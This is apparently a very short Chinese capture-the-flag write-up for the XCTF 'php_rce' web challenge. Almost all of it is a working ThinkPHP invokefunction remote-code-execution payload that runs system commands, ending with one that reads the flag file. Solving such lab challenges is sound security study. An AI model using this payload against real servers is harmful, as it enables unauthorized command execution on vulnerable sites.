攻防世界web-php_rce
通过参考这篇文章,得到payload
?s=index/\think\App/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=dir
php -r "phpinfo();"
所以这道题的payload为:
?s=index/\think\App/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php -r "system('cat ../../../flag');"